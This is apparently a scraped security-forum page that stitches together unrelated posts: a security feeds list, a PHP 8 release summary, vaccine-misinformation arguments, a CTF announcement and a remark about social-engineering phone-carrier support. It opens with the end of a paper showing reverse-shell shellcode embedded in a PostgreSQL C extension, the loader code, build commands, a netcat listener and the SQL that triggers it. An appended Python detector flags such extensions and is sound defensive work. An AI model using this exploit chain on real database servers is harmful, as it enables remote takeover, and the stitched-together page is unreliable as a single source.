"\xd5\x50\x50\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2"
"\x48\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5\x48"
"\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9\x41\xba\x99"
"\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02\x00\x00\x49\xb8\x63"
"\x6d\x64\x00\x00\x00\x00\x00\x41\x50\x41\x50\x48\x89\xe2\x57"
"\x57\x57\x4d\x31\xc0\x6a\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44"
"\x24\x54\x01\x01\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6"
"\x56\x50\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff"
"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86\xff\xd5"
"\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08\x87\x1d\x60\xff"
"\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6\x95\xbd\x9d\xff\xd5\x48"
"\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13"
"\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5";

PGDLLEXPORT Datum shellcode(PG_FUNCTION_ARGS);
PG_FUNCTION_INFO_V1(shellcode);

Datum shellcode(PG_FUNCTION_ARGS)
{
    /* Classic method to load a shellcode in memory and create/execute a new thread at its location. */
    LPVOID p = VirtualAlloc(NULL, sizeof(payload), (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
    DWORD dwThreadId;

    MoveMemory(p, &payload, sizeof(payload));
    CreateThread(NULL, 0, p, NULL, 0, &dwThreadId);

    PG_RETURN_VOID();
}
```

```
x86_64-w64-mingw32-gcc.exe PgShellcodeExt.c -c -o PgShellcodeExt.o -I "C:\Program Files\PostgreSQL\13\include" -I "C:\Program Files\PostgreSQL\13\include\server" -I "C:\Program Files\PostgreSQL\13\include\server\port\win32"
x86_64-w64-mingw32-gcc.exe -o PgShellcodeExt.dll -s -shared PgShellcodeExt.o -Wl,--subsystem,windows
```

We can now open a new local netcat listener on our attacker's machine.

```
user@local:$ nc -lvp 443
```

And then register and trigger our custom extension with the following SQL statements (still from our PgAdmin instance):

```sql
-- Register new function
CREATE OR REPLACE FUNCTION shellcode() RETURNS void AS 'C:\Users\Jean-Pierre LESUEUR\Desktop\PgShellcodeExt\PgShellcodeExt.dll', 'shellcode' LANGUAGE C STRICT;

-- Trigger function
SELECT shellcode();

-- Delete function
DROP FUNCTION IF EXISTS shellcode;
```

Checking our local netcat listener reveals we've successfully received our reverse shell.

CONCLUSION

This paper demonstrated how to take advantage of postgres extension capabilities to execute shellcode. But it will need more effort in production to be usable. First you will need to find a way to execute SQL queries as a privileged postgres user (required to implement new extensions), most of the time from a SQL injection present in a vulnerable application.
Secondly, you will need to find a way to transfer your DLL extension to the target machine, for example through:

Additional SQL statements
File uploads
Shares
etc…

Feel free to port this example to another operating system (e.g. Linux). Most of it is very similar. We will probably post another paper on this subject for Linux.

WRITTEN NOV. 27, 2020, 11:14 A.M. BY JEAN-PIERRE LESUEUR

Source: https://www.phrozen.io/resources/paper/41df297b-cfe3-43ec-88e8-0686e5548dd5
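From the defender's side, the registration step the paper relies on leaves two durable traces: the CREATE FUNCTION ... LANGUAGE C statement in the server log (when log_statement is at least 'ddl') and the pg_proc row whose probin column holds the library path. The Python script below is an added example, not code from the paper or from PostgreSQL; it flags C-language functions whose library lives outside $libdir, which is where legitimately installed extensions are loaded from. The log format assumes the default log_line_prefix '%m [%p] ', the trusted-prefix list is a site-specific assumption, and the sample log lines, pg_proc rows and DLL path are constructed placeholders.

```python
"""Audit PostgreSQL for C-language functions loaded from untrusted paths."""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List, Optional, Sequence

# Library locations a C function may legitimately come from. "$libdir" is how
# CREATE FUNCTION refers to the server's own library directory; a path under a
# user profile, a temp directory or a UNC share deserves a look.
# Assumption: operators extend this list per site.
TRUSTED_PREFIXES: Sequence[str] = ("$libdir",)

# CREATE [OR REPLACE] FUNCTION name(args) ... AS 'library'[, 'symbol'] ... LANGUAGE C
CREATE_C_FUNC_RE = re.compile(
    r"CREATE\s+(?:OR\s+REPLACE\s+)?FUNCTION\s+(?P<name>[^\s(]+)\s*\([^)]*\)"
    r".*?\bAS\s+'(?P<lib>[^']+)'(?:\s*,\s*'(?P<sym>[^']+)')?"
    r".*?\bLANGUAGE\s+C\b",
    re.IGNORECASE | re.DOTALL,
)

# Assumption: default log_line_prefix '%m [%p] ' and log_statement = 'ddl'
# (or 'all'), so each DDL statement is logged as "LOG:  statement: ...".
LOG_LINE_RE = re.compile(
    r"^(?P<ts>\S+ \S+ \S+) \[(?P<pid>\d+)\] LOG:\s+statement:\s+(?P<sql>.*)$"
)


@dataclass
class Finding:
    source: str   # "log" or "pg_proc"
    name: str     # SQL-level function name
    lib: str      # library path as written in CREATE FUNCTION / pg_proc.probin
    detail: str


def is_trusted_path(lib: str, trusted: Sequence[str] = TRUSTED_PREFIXES) -> bool:
    """True only if the library path starts with a trusted prefix and does not
    climb out of it with '..'. Backslashes are normalised so Windows paths are
    judged the same way as POSIX ones."""
    norm = lib.replace("\\", "/")
    if ".." in norm.split("/"):
        return False
    return any(norm.startswith(p) for p in trusted)


def scan_log_lines(lines: Iterable[str],
                   trusted: Sequence[str] = TRUSTED_PREFIXES) -> List[Finding]:
    """Flag logged CREATE FUNCTION ... LANGUAGE C statements whose library is
    outside the trusted prefixes."""
    findings: List[Finding] = []
    for line in lines:
        m = LOG_LINE_RE.match(line.strip())
        if not m:
            continue
        f = CREATE_C_FUNC_RE.search(m.group("sql"))
        if f and not is_trusted_path(f.group("lib"), trusted):
            symbol = f.group("sym") or f.group("name")
            findings.append(Finding(
                "log", f.group("name"), f.group("lib"),
                f"pid {m.group('pid')} at {m.group('ts')}, symbol {symbol}",
            ))
    return findings


def audit_pg_proc(rows: Iterable[Dict[str, Optional[str]]],
                  trusted: Sequence[str] = TRUSTED_PREFIXES) -> List[Finding]:
    """Same check against catalog rows, which also catches functions registered
    before statement logging was switched on. Expected columns are those of:
      SELECT p.proname, l.lanname, p.probin
        FROM pg_proc p JOIN pg_language l ON l.oid = p.prolang;
    """
    findings: List[Finding] = []
    for r in rows:
        if (r.get("lanname") or "").lower() != "c":
            continue
        lib = r.get("probin") or ""
        if not is_trusted_path(lib, trusted):
            findings.append(Finding("pg_proc", r["proname"] or "", lib,
                                    "C function outside trusted library directory"))
    return findings


# Constructed sample data (not real server output); the DLL path is a placeholder.
SAMPLE_LOG_LINES = [
    r"2020-11-27 11:14:03.117 CET [4321] LOG:  statement: CREATE OR REPLACE FUNCTION shellcode() RETURNS void AS 'C:\Users\someuser\Desktop\PgShellcodeExt\PgShellcodeExt.dll', 'shellcode' LANGUAGE C STRICT;",
    r"2020-11-27 11:14:05.009 CET [4321] LOG:  statement: SELECT shellcode();",
    r"2020-11-27 11:20:00.000 CET [5555] LOG:  statement: CREATE FUNCTION add_one(integer) RETURNS integer AS '$libdir/example', 'add_one' LANGUAGE C STRICT;",
    r"2020-11-27 11:21:00.000 CET [5555] LOG:  statement: CREATE FUNCTION twice(int) RETURNS int AS $$ SELECT $1 * 2 $$ LANGUAGE sql;",
]
SAMPLE_PG_PROC_ROWS = [
    {"proname": "add_one", "lanname": "c", "probin": "$libdir/example"},
    {"proname": "shellcode", "lanname": "c",
     "probin": r"C:\Users\someuser\Desktop\PgShellcodeExt\PgShellcodeExt.dll"},
    {"proname": "twice", "lanname": "sql", "probin": None},
]

if __name__ == "__main__":
    for fnd in scan_log_lines(SAMPLE_LOG_LINES) + audit_pg_proc(SAMPLE_PG_PROC_ROWS):
        print(f"[{fnd.source}] {fnd.name}: {fnd.lib} ({fnd.detail})")
```

Run against the constructed data, only the function loaded from the user's Desktop is reported, once from the log and once from the catalog; the $libdir function and the SQL-language function pass. The catalog check matters because the paper's own cleanup step (DROP FUNCTION) removes the pg_proc row, so a log review is the only place the short-lived registration remains visible, while the catalog review catches the opposite case of a function that was left behind.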
  11. Awesome Security Feeds

A semi-curated list of security feeds. You can import the OPML file into a service like Feedly. Below is a list of all the sites; feel free to suggest others!

Must Read: TorrentFreak Schneier on Security Darknet Troy Hunt's Blog Securelist Dan Kaminsky's Blog ZDNet | The Ed Bott Report RSS Daniel Miessler Infosec Reactions Malwarebytes Labs Security Research & Defense Have I Been Pwned latest breaches Malware Must Die! enigma0x3 SkullSecurity News – – WordPress.org

Conferences & Video: Paul's Security Weekly Defcon SecurityTube.Net media.ccc.de - NEWS Vimeo / Offensive Security’s videos Irongeek's Security Site

Italiano: dirittodellinformatica.it - Rivista telematica su diritto e tecnologia oneOpenSource Securityinfo.it D3Lab Trin Tragula 0x2A ICT Security Magazine Andrea Draghetti VoidSec Luca Mercatanti WebSecurity IT Over Security Zeus News - Olimpo Informatico Autistici Dark Space Blogspot Yoroi Warning Archive Feed Baty's Base F-Hack » Feed Arturo Di Corinto Il Disinformatico Cyber Division CyberDifesa.it cavallette TG Soft Software House - News Codice Insicuro, blog di Cyber Security, sviluppo sicuro, code review e altro.
Cyber Security IT Service Management News TS-WAY Stories by theMiddle on Medium Fabio Natalucci Post LastKnight.com Feed PANOPTICON ESCAPE CyberIntelligence CyberCrime & Doing Time Cyber Strategies for a World at War Automating OSINT Blog bellingcat IntelTechniques Red Teaming - Red Teams Uncommon Sense Security JestersCourt Silendo Krypt3ia Security Intelligence and Big Data reddit Information Security Training Resources /r/netsec - Information Security News & Discussion Deep Web Reverse Engineering Blackhat Library Computer Forensics Your Hacking Tutorial by Zempirians RedTeam Security Social Engineering Information Security netsecstudents: Subreddit for students studying Network Security and its related subjects Blog Cybrary Joe's Security Blog Kevin Chung Randy Westergren evilsocket Webroot Blog shell-storm BugCrowd ZeroSec - Adventures In Information Security DigiNinja SkullSecurity l.avala.mp's place HighOn.Coffee Max Justicz Null Byte Krebs on Security BREAKDEV EFF ProtonMail Blog SANS Internet Storm Center, InfoCON: green NetSPI Blog 0x00sec - The Home of the Hacker - Monthly top topics Open Web Application Security Project Bromium 🔐Blog of Osanda Coding Horror Application Security Research, News, and Education Blog xorl %eax, %eax TaoSecurity Blog Updates from the Tor Project thinkst Thoughts... David Longenecker JestersCourt Technical phillips321.co.uk Add / Xor / Rol Intercept the planet! @Mediaservice.net Technical Blog AlienVault Labs Blog MalwareDomainList updates winscripting.blog PenTest Labs Brett Buerhaus Jack Hacks 0x27.me The Exploit Laboratory Linux Audit CERT Blogs Forcepoint markitzeroday.com Down the Security Rabbithole Blog - Supplemental Research Blogs Feed NotSoSecure CYBER ARMS Blog – LookingGlass Cyber Solutions Inc. 
Cofense anti-virus rants Hackw0rm.net Attack and Defense Labs AverageSecurityGuy Shodan Blog BalalaikaCr3w TrustedSec CyberWatch JUMPSEC | CREST Accredited Dave Waterson on Security Shell is Only the Beginning MDSec dotcppfile's Blog #_shellntel binary foray Blog HolisticInfoSec™ Secureworks Blog NETRESEC Network Security Blog The Honeynet Project blogs Pending Technical Errata Security Cylance Blog Red Hat Security Inspired-Sec Furoner.CAT 0xAA - Random notes on security Fzuckerman© HIPAA News, Web & Email Security Tips & News - Plus More | LuxSci Bromium Labs The Ethical Hacker Network Hacking and security The Grymoire Active questions tagged linux - Information Security Stack Exchange /dev/random 0x3a - Security Specialist and programmer by trade Security Research & Defense US-CERT Alerts Strategic Cyber LLC Rapid7 Blog VulnHub ~ Entries Shell is coming ... Lastline Blog Maltego MalwareTech Hacking Articles Microsoft Security Infosec Resources WhiteScope IO Security – Cisco Blogs Unmask Parasites. Blog. TheGeryCorner Imperva Cyber Security Blog Hanno's blog Checkmarx Active Directory Security StopBadware blogs Azeria Labs Pentestmag KernelPicnic Blog - Decent Security SpiderLabs Blog from Trustwave Mogozobo Stealing the Network 4sysops Rhino Security Labs Astr0baby's not so random thoughts _____ rand() % 100; Hakin9 – IT Security Magazine Blog TrendLabs Security Intelligence Blog Appsecco Penetration Testing contagio Security Through Education Blog – WhiteHat Security DEADCODE Javvad Malik Shell is Only the Beginning NetSPI Blog Eric Conrad Andrew Hay Milo2012's Security Blog #!/slash/note Securosis Complete Jump ESP, jump! 
SerHack – Security research on SerHack – Security researcher Carnal0wnage & Attack Research Blog www.crowdstrike.com/blog harmj0y US-CERT Current Activity Seculert Blog on Breach Detection damsky Black Hills Information Security Mosaic Security Research Sucuri Blog Security Art Work XyliBox Carnal0wnage & Attack Research Blog The Sakurity Blog thepcn3rd - Passion for Infosec | bohops | Real-time communications security on Communication Breakdown - real-time communications security blackMORE Ops Security and risk Qualys Security Blog Securelist Malware Analysis: The Final Frontier myexploit Martin Vigo Common Exploits – Penetration Testing Information RedTeams Corelan Team Cybersecurity Blog PC's Xcetra Support Nat McHugh AppSec-Labs | Application Security gynvael.coldwind//vx.log (en) Blaze's Security Blog Bill Demirkapi’s Blog Infosec Island Latest Articles SANS Institute Security Awareness Tip of the Day Threat Research Cybercrime Magazine Forensic Focus TaoSecurity Security Training Security Zap Wiremask's Feed ExposedBotnets Shell is Only the Beginning SecurityCurrent Posts By SpecterOps Team Members Cheesy Rumbles @D00m3dr4v3n enigma0x3 Posts on malicious.link Hacking Exposed Computer Forensics Blog Volatility Labs Team-Cymru Security Spread Security Basics Cisco Blog » Security Silent Signal Techblog Security on the edge Délimiteur de données sirdarckcat Aditya Agrawal TheHackerBlog Labs PortCullis Fox-IT International blog Lab of a Penetration Tester F-Secure Antivirus Research Weblog HackTips The Life of a Penetration Tester Virus Bulletin's blog Tenable Blog Didier Stevens Oddvar Moe's Blog Google Online Security Blog Sucuri Blog Darknet Yubico Sam Curry F-Secure Antivirus Research Weblog Thoughts on Security Tyranid's Lair Orange Cyberdefense Inspired-Sec Stories by Scott J Roberts on Medium Aditya Agrawal Fortinet Blog Tech Vomit LockBoxx Mozilla Security Blog Blog – NotSoSecure MSitPros Blog CERIAS Combined Feed The World of IT & Cyber Security: 
ehacking.net BlueKaizen Security Sift KahuSecurity Trend Micro Subliminal Hacking NVISO Labs HACKMAGEDDON Lenny Zeltser Security Christopher Truncer's Website A Few Thoughts on Cryptographic Engineering Project Zero w00tsec I CAN'T HACK IT …OR CAN I? ImperialViolet sploitF-U-N Netwrix Blog | Insights for Cybersecurity and IT Pros RefinePro Knowledge Base for OpenRefine khr@sh#: echo $GREETING Web Security Nibble Security Security Breached Blog Agarri : Sécurité informatique offensive Minded Security Blog Bug Bounty POC Telekom Security Random stuff by yappare Brett Buerhaus FoxGlove Security Noob Ninja! OpnSec WHITE HAT - WRITE UPS - RSS Security Thoughts Nikhil Mittal's Blog mert's blog the world. according to koto Patrik Fehrenbach PortSwigger Blog Hacking Distro BackBox Linux blogs Kali Linux WeakNet Labs DistroWatch.com: News Tails - News Security Tools ToolsWatch.org Network Security™ KitPloit - PenTest Tools! Security News Graham Cluley The Hacker News ThreatPost Security Affairs Trend Micro Simply Security The Register - Security Palo Alto Networks Blog Instapaper: Unread SANS Digital Forensics and Incident Response Blog Dark Reading

Source: https://github.com/mrtouch93/awesome-security-feed
  12. PHP 8 is now Released!

NOVEMBER 27, 2020 / ERIC L. BARNES

The PHP development team announced the release of PHP 8 yesterday:

PHP 8.0 is a major update of the PHP language. It contains many new features and optimizations including named arguments, union types, attributes, constructor property promotion, match expression, nullsafe operator, JIT, and improvements in the type system, error handling, and consistency.

Here is the list of main new features:

Union Types
Named Arguments
Match Expressions
Attributes
Constructor Property Promotion
Nullsafe Operator
Weak Maps
Just In Time Compilation
And much much more…

Here are some of the highlights from the announcement:

PHP 8 Named arguments

// PHP 7
htmlspecialchars($string, ENT_COMPAT | ENT_HTML401, 'UTF-8', false);

// PHP 8
// Specify only required parameters, skipping optional ones.
// Arguments are order-independent and self-documented.
htmlspecialchars($string, double_encode: false);

PHP 8 Attributes

Instead of PHPDoc annotations, you can now use structured metadata with PHP's native syntax.

// PHP 7
class PostsController
{
    /**
     * @Route("/api/posts/{id}", methods={"GET"})
     */
    public function get($id) { /* ... */ }
}

// PHP 8
class PostsController
{
    #[Route("/api/posts/{id}", methods: ["GET"])]
    public function get($id) { /* ... */ }
}

PHP 8 Constructor property promotion

Less boilerplate code to define and initialize properties.

// PHP 7
class Point {
  public float $x;
  public float $y;
  public float $z;

  public function __construct(
    float $x = 0.0,
    float $y = 0.0,
    float $z = 0.0,
  ) {
    $this->x = $x;
    $this->y = $y;
    $this->z = $z;
  }
}

// PHP 8
class Point {
  public function __construct(
    public float $x = 0.0,
    public float $y = 0.0,
    public float $z = 0.0,
  ) {}
}

PHP 8 Union types

Instead of PHPDoc annotations for a combination of types, you can use native union type declarations that are validated at runtime.
// PHP 7
class Number {
  /** @var int|float */
  private $number;

  /**
   * @param float|int $number
   */
  public function __construct($number) {
    $this->number = $number;
  }
}

new Number('NaN'); // Ok

// PHP 8
class Number {
  public function __construct(
    private int|float $number
  ) {}
}

new Number('NaN'); // TypeError

PHP 8 Nullsafe operator

Instead of null check conditions, you can now use a chain of calls with the new nullsafe operator. When the evaluation of one element in the chain fails, the execution of the entire chain aborts and the entire chain evaluates to null.

// PHP 7
$country = null;

if ($session !== null) {
  $user = $session->user;

  if ($user !== null) {
    $address = $user->getAddress();

    if ($address !== null) {
      $country = $address->country;
    }
  }
}

// PHP 8
$country = $session?->user?->getAddress()?->country;

PHP 8 Match expression

The new match is similar to switch and has the following features:

Match is an expression, meaning its result can be stored in a variable or returned.
Match branches only support single-line expressions and do not need a break; statement.
Match does strict comparisons.

// PHP 7
switch (8.0) {
  case '8.0':
    $result = "Oh no!";
    break;
  case 8.0:
    $result = "This is what I expected";
    break;
}
echo $result;
//> Oh no!

// PHP 8
echo match (8.0) {
  '8.0' => "Oh no!",
  8.0 => "This is what I expected",
};
//> This is what I expected

Of course, these are just the highlights. Check out the official release announcement for all the details.

Source: https://laravel-news.com/php-8
  13. I agree with what he says, nothing can be 100% safe no matter how many years of testing are done. But I don't see him saying that the problems come from microchips being put into vaccines or that they cause autism. That's what I was referring to. Serious problems can arise from pills too, and people gulp pills down by the fistful. And I'm not talking about "exotic" pills, but any kind of medication. That's why almost every medication leaflet says things like: "Do not take if you are allergic to tri-methyl-benzeno-cortisol (meaningless term made up just now)" and many other contraindications. @RazvanDC I could also say some things about IT, such as: "The Linux/Windows/Mac operating system is not secure! It contains a backdoor that hands over all user data to the American/Russian/Chinese government! Stop using this OS, it's safer for you!" - I could say that for various reasons, such as notoriety, to get into the press and become a celebrity, or for money, paid by one of the competing companies, or just for laughs, and let the information spread. What I say reaches a doctor; can he contradict me? If I have experience in IT, does that mean everything I say about the field is true?
  14. Leaving aside those moronic theories that only illiterates can believe, with chips and who knows what else, generally speaking, I think every time a new technology has appeared, such theories have appeared too. I happened to search on Google and it seems 3G was dangerous to your health (as is said now about 5G): https://www.dailymail.co.uk/health/article-198250/3G-mobile-masts-health-risk.html I heard the same thing about 4G as well. As for vaccines, I haven't really heard that garbage about them "causing autism" lately. The author of a fake study on the subject admitted that he was paid to write it (by the parents of some children) and may even have been jailed. Now chips are the fashion. Does anyone have any idea where this comes from? The funny part is that the ones who believe this are precisely those people who are a waste of space, with intelligence well below average and not many achievements in life. It seems they are the ones who think "the big interests" want to control them. What would they do with them? I don't know, put them to work with a hoe. But for that 10 euros a day is enough, not a technology that won't exist any time soon.
  15. Very interesting article. About the 2 days: "On January 11, researchers from China published the genetic sequence of the novel coronavirus. Two days later, Moderna's team and NIH scientists had finalized the targeted genetic sequence it would use in its vaccine" So a good part of the problem had already been solved. Since the technology and the knowledge had existed for years, I think the vaccine could have been "made" in 2 hours. But the article really does contain useful things. mRNA FTW!
  16. The Russian vaccine is only now in phase III of testing. Pfizer/BioNTech had passed this phase when they made the announcement. It's possible that the Chinese or Russian vaccines work too; the problem with them is the lack of transparency, as you said, but also the small number of tests performed. Although I am completely pro-vaccination, I don't agree with mandatory vaccination either, and the only reason is the small number of tests performed. But I for one would still get vaccinated, and I'd do it on Zoom. I don't understand which figures contradict each other. I didn't read that long post full of garbage because I didn't want to bang my head against the wall. Here's a text below, let's see if you pass it on the way you pass on the other garbage: "A hacker known by the pseudonym @black_death_c4t gained access to Pfizer's servers and managed to decrypt the genome of the new vaccine. He published the bio-molecular analysis of the vaccine on his favourite social platform, PornHub, where the data is still available. It appears the vaccine contains a substance unknown on this planet and the only explanation is that this vaccine was designed by extraterrestrials to take control of humanity. The researcher with a doctorate in genetic medicine and a doctorate in virology, @Nytro, stated that he analysed the results and that in fact the hacker was stoned and was just watching porn. Michael Jackson, chief physician at the University of Kentucky, together with Colonel Sanders, mentioned that the published numbers are not real and that the source of the deaths is humanity using too much garlic sauce." For fuck's sake, you find a text with some "foreign" names and other illogical crap and you take it at face value.
  17. Nytro

    Fun stuff

    English is important if you want a career in IT. Here's a "basic" tutorial for beginners: https://9gag.com/gag/a9ngZ7j
  18. https://arhiblog.ro/actioneaza-vaccinurile-covid/ PS: That article won't be read by many people. And whenever we try, we won't succeed. People are stupid. I mean, for fuck's sake, YouTube Trending: https://www.youtube.com/feed/trending That's what gets searched for on a platform where you can find videos about viruses, vaccines or even how a nuclear bomb works. Jador or Tzanca Uraganul are easier to understand.
  19. From what I had read, the current vaccines also work against the mink mutation. But over time there will probably be mutations that "bypass" the vaccine. Although with the new production technology (that messenger RNA), I think a new one will be found fairly quickly. As happens with the flu. That's why "modern" flu vaccines are quadrivalent - that is, they cover 4 strains of the flu virus.
  20. We will never do escrow. There's no reason to. Everyone, whether they want to sell or want to buy, takes on the responsibility themselves, like on OLX. We require a minimum of 50 posts precisely to establish a minimum level of trust, to see roughly "what a user can do" before doing business with them. But in the end, it's everyone's own decision.
  21. Usually I social-engineer the support staff at the GSM operator, but it's probably easier this way, since support staff are trained for such things.
  22. 2020-12-05 09:00:00 UTC — 2020-12-07 09:00:00 UTC

DefCamp Capture The Flag (D-CTF) is the most shattering and rebellious security CTF competition in Central Eastern Europe. Here, the most skilled hackers & IT geeks put their knowledge to the test and compete with the best CTF teams from all over the world to get into the shortlist of the top 10, and later on win the overall D-CTF competition or die trying. DefCamp Capture the Flag has been organised since 2011, with over 10,000 players having joined since then in an annual multi-staged event open to anyone. There is one important rule though – hack before being hacked!

Event Summary
Format: Jeopardy
Play format: Team only
Genres: Crypto, Pwning, Reversing, Web, Miscellaneous …
Language: English
Access: Open / Free for everyone
Difficulty: Entry Level - Easy - Medium - Hard - Insane
Website: D-CTF

Details: https://dctf2020.cyberedu.ro/
  23. adragos is a really good guy at CTFs. From what I understand, during our CTF another one was taking place, and some people went to that one. Something international. Yes, we are Romanians
  24. It's not physically possible. There are "wireless" charging technologies, generally over short distances, by induction, but there are also devices that can charge from the electromagnetic waves in the surrounding field (e.g. radio). It's possible, the technology exists and is used for low-power sensors, but that charge is EXTREMELY small. Either the phone isn't showing correctly how much battery it has (most likely), or (although I think that's a stretch) that APK, if it had the necessary privileges, could change the battery charge to any percentage (display only, there was no way it could actually charge it).